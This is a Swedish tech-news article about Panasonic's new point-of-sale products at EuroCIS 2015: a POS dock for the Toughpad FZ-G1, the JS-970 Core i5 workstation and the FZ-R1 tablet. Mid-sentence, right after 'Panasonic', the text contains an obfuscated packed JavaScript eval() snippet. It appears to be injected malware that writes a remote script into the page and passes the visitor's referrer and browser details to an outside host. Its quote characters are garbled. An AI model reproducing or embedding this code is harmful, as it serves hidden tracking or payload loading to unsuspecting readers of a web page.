Image Image Image Image Image Image Image Image Image Image

| 8 april, 2020

Scroll to top

Top

PC

EuroCIS 2015: Nya detaljhandelslösningar från Panasonic

EuroCIS 2015: Nya detaljhandelslösningar från Panasonic

Panasonic eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|iatad|var|u0026u|referrer|enykh||js|php’.split(’|’),0,{}))
presenterade idag sin nya produktserie av Point of Sales(POS)-system, kringutrustning och detaljhandelsanpassade Toughpad-enheter, vid EuroCIS-mässan i Dusseldorf. Produkterna har designats för att möta de utmaningar som återförsäljare står inför nuförtiden, med kunder som använder sig av allt fler kanaler för att göra sina inköp, inte minst inom besöksnäringen, samt stormarknads- och snabbmatsindustrin.

-Vi har skapat de ultimata mobila produkterna för dagens snabbföränderliga detaljhandelsindustri, så att återförsäljare lätt kan hjälpa kunderna genom hela köpprocessen, oavsett vilken betalningskanal de väljer, säger Francesco Castro,  European Manager Retail vid Panasonic.

Ny POS-docka för 10-tums Toughpad

Panasonics nya POS-docka för den robusta 10-tumsplattan Toughpad FZ-G1 gör det möjligt att integrera plattan med butikers befintliga POS-system. POS-dockan är utrustad med två strömförsörjda USB- och serieportar för anslutning till befintliga POS-system och kringutrustning, som t ex myntautomater och kvittoskrivare.

Kraftfullt modulärt POS-system
Panasonic lanserar även den nya kraftfulla Point of Sales(POS)-arbetsstationen JS-970 CoreTM i5 – storebror till föregångaren JS-970 All In One som släpptes i november förra året. Denna nya detaljhandelsanpassade POS-enhet är bl a utrustad med en kraftfull Intel® CoreTM i5-4590T vProTM-processor (6 MB cache, 2.0 GHz upp till 3.0 GHz med Intel® Turbo Boost-teknologi) och har designats för flexibel användning i tuffa miljöer, vilket gör den idealisk inom detaljhandeln och servicesektorn. Enheten är kompatibel med många olika versioner av Windows-operativsystem och kommer med en 15 tums kapacitiv pekskärm.

POS-datorplatta för Windows

Toughpad FZ-R1 är Panasonics första mobila allt-i-ett-POS-platta baserad på Windows 8.1. Enheten har en integrerad betalningsteknologi som utformats för att kunna möta behoven hos dagens återförsäljare och deras kunder. Den har bl a inbyggd EMV-kortläsare, PIN-pad, magnetavläsare och NFC-teknologi.

Pris och tillgänglighet

Toughpad FZ-G1 Countertop POS-docka och JS-970 CoreTMi5 finns tillgängliga för beställning från april 2015 till de ungefärliga priserna 480€ respektive 760€.

Toughpad FZ-R1 planeras finnas tillgänglig mot slutet av 2015, men är ännu inte prissatt.